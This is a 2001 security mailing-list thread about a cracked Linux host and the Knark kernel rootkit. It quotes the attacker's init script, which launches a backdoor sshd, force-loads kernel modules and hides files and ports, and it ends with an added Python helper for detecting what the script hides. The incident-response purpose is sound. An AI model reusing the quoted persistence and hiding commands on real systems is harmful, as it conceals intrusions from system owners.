Security Incidents mailing list archives
Re: Cracked. Possible(?) new rootkit ?
From: Michael Witt <bravens1 () earthlink net>
Date: Wed, 14 Feb 2001 19:40:00 -0500
Greetings,

The rootkit you found is called KNARK. KNARK is a first generation kernel rootkit that is designed to exclusively exploit the LINUX 2.2 kernel. Not only is Tripwire ineffective against this rootkit, but the standard practice of using "good binaries" on a floppy or CD is unsuccessful as well. Since the kernel itself is rootkitted, the kernel always uses its binaries vice the valid binaries located on a floppy or CD. The kernel rootkits were described at both the 2000 FIRST and 2000 Blackhat Conferences as "game over" if they get installed because of the immense difficulty in identifying that a system has actually had the kernel rootkit installed.

Impact: KNARK will allow the intruder to continue to operate in stealth mode. This kernel rootkit also installs a tool that allows the rootkit to move files/data from the compromised system through a backdoor.

More information concerning KNARK and KMOD (Solaris kernel rootkit) and the rootkits themselves can be found at the following website: www.gothacked.net

Mike Witt
Riptech, Inc.

----- Original Message -----
From: "maarten van den Berg" <maarten () VBVB NL>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Wednesday, February 14, 2001 10:21 AM
Subject: Cracked. Possible(?) new rootkit ?
Hi,

Maybe I'm mistaken and this is old stuff, but... I recently found a box which was obviously cracked, at least all the evidence definitely points that way...

After a (kernel-)upgrade, some service led to crashing the whole machine. The service in question was called "system", and this is what /etc/rc.d/rc3.d/S99system looks like:

_____ cut here ______
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

/var/kerb/ssh.d > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
#exec redir
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd
/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null
#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
_____ cut here _____

Judging just from the file, an alternative sshd (ssh.d) is started, two kernel modules are inserted, a binary hides certain strings in something network-related, and a binary 'hidef' hides everything including itself. I have not had time yet to do any more research, but I bet it was just pure luck that this toolkit didn't function well under a new kernel, thus exposing itself...

I know what to do now, reinstall from scratch, but I was wondering if this is interesting stuff for the list, or whether it is merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with a well-known rootkit etc.

Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that didn't detect anything, running or otherwise.

Maarten

_____ Listing of /var/kerb/ _____
drwxr-xr-x root/ftp        0 2000-07-27 21:40:46 kerb/
drwxr-xr-x root/root       0 2000-07-12 03:43:50 kerb/s/
-rwxr-xr-x root/root  129076 2000-07-12 03:20:11 kerb/s/dsniff
-rwxr-xr-x root/root   20100 2000-07-12 03:20:16 kerb/s/arpredirect
-rw-r--r-- root/root    1009 2000-07-12 03:43:50 kerb/s/dsniff.services
-rwxr-xr-x root/root   93580 2000-07-12 03:26:17 kerb/s/urlsnarf
-rwxr-xr-x root/ftp    13468 2000-07-12 08:29:59 kerb/ered
-rwxr-xr-x root/ftp     3984 2000-07-12 08:29:59 kerb/hidef
-rw-r--r-- root/ftp      537 2000-07-12 08:29:59 kerb/k.a
-rwxr-xr-x root/ftp    35016 2000-07-12 08:29:59 kerb/l
-rwxr-xr-x root/ftp    13036 2000-07-12 08:29:59 kerb/nethide
-rwxr-xr-x root/ftp    27896 2000-07-12 08:29:59 kerb/p
-rwxr-xr-x root/ftp     8128 2000-07-12 08:29:59 kerb/pidof
-rw------- root/ftp      512 2001-02-14 16:01:40 kerb/sd.a
-rwxr-xr-x root/ftp   196408 2000-07-12 08:29:59 kerb/ssh.d
-rw-r--r-- root/ftp      960 2000-07-12 08:29:59 kerb/supermd.o
-rw-r--r-- root/ftp    12292 2000-07-12 08:29:59 kerb/supernw.o
_____ end of listing _____
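The S99system script quoted above is a useful artifact on its own: it tells a responder which kernel modules were loaded, which paths the module is hiding, and which port strings nethide was given. The following is an added triage example, not code from the thread or from any rootkit or tool it mentions. It parses an abridged copy of the quoted script, decodes the hex port arguments as they would appear in /proc/net/tcp (":1F98" is port 8088), and implements the classic stat-versus-readdir check for files a kernel module hides from directory listings. Two labelled assumptions: that nethide's argument is matched as a substring of the local-address field of /proc/net/tcp lines, and that the sample /proc/net/tcp text below is constructed, not captured from the compromised host.

```python
"""Triage helper for an init-script rootkit installer (added example).

Parses the quoted S99system script, decodes the nethide port strings,
checks a /proc/net/tcp snapshot for listeners those strings would hide,
and offers a stat-vs-listdir check for hidden files.
"""
import os
import re
import shlex

# Abridged copy of the script quoted in the post; comment lines omitted.
S99SYSTEM = """#!/bin/sh
/var/kerb/ssh.d > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
"""

# CONSTRUCTED /proc/net/tcp sample: sshd on 22 (0x0016) and a listener on
# 8088 (0x1F98). Real snapshots from a rootkitted kernel would omit the
# hidden line; this one shows what an untampered view should contain.
SAMPLE_PROC_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 00000000 300 0 0 2 -1
   1: 00000000:1F98 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 00000000 300 0 0 2 -1
"""

TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN", "06": "TIME_WAIT"}
REDIRECT = re.compile(r"\s*\d?>\s*\S+")  # strips "> /dev/null 2> /dev/null"


def parse_installer(script):
    """Classify each command line by the basename of its program."""
    found = {"modules": [], "hidden_paths": [], "hidden_ports": [], "started": []}
    for raw in script.splitlines():
        line = REDIRECT.sub("", raw.split("#", 1)[0]).strip()
        if not line:
            continue
        argv = shlex.split(line)  # handles the quoted ":1F98" argument
        cmd = os.path.basename(argv[0])
        if cmd == "insmod":
            found["modules"].append(argv[-1])
        elif cmd == "nethide":
            found["hidden_ports"].append(argv[1])
        elif cmd == "hidef":
            found["hidden_paths"].append(argv[1])
        elif cmd == "kill":
            continue  # signal to the daemon, nothing persistent to record
        else:
            found["started"].append(argv[0])
    return found


def decode_port(hex_string):
    """':1F98' -> 8088; /proc/net/tcp encodes ports as 4 hex digits."""
    return int(hex_string.lstrip(":"), 16)


def hidden_listeners(proc_tcp_text, hidden_strings):
    """Sockets in a /proc/net/tcp snapshot that the nethide strings would hide.

    ASSUMPTION: nethide matches its argument as a substring of the
    local_address field ("00000000:1F98"), so we test the same way.
    """
    hits = []
    for line in proc_tcp_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if any(h in local for h in hidden_strings):
            hits.append((int(local.split(":")[1], 16), TCP_STATES.get(state, state)))
    return hits


def find_hidden_files(paths, listdir=os.listdir, exists=os.path.lexists):
    """Paths that stat() can reach but that do not appear in their directory listing.

    A module hooking getdents hides names from readdir, but a direct stat
    on the known name still succeeds; the discrepancy is the indicator.
    """
    hidden = []
    for path in paths:
        directory, name = os.path.split(path)
        try:
            listed = listdir(directory or "/")
        except OSError:
            continue
        if exists(path) and name not in listed:
            hidden.append(path)
    return hidden


if __name__ == "__main__":
    report = parse_installer(S99SYSTEM)
    print("modules loaded:", report["modules"])
    print("hidden ports:", [decode_port(p) for p in report["hidden_ports"]])
    print("hidden listeners in sample:", hidden_listeners(SAMPLE_PROC_TCP, report["hidden_ports"]))
    print("hidden files on this host:", find_hidden_files(report["hidden_paths"]))
```

The decoded ports are what to probe from a separate, trusted host: the local netstat on a kernel-rootkitted box cannot be believed, which is the point Mike Witt makes about clean binaries on a floppy. The stat-versus-listdir check is the same idea applied to the filesystem and is only meaningful when run against the paths the script names; on an uncompromised host it returns an empty list.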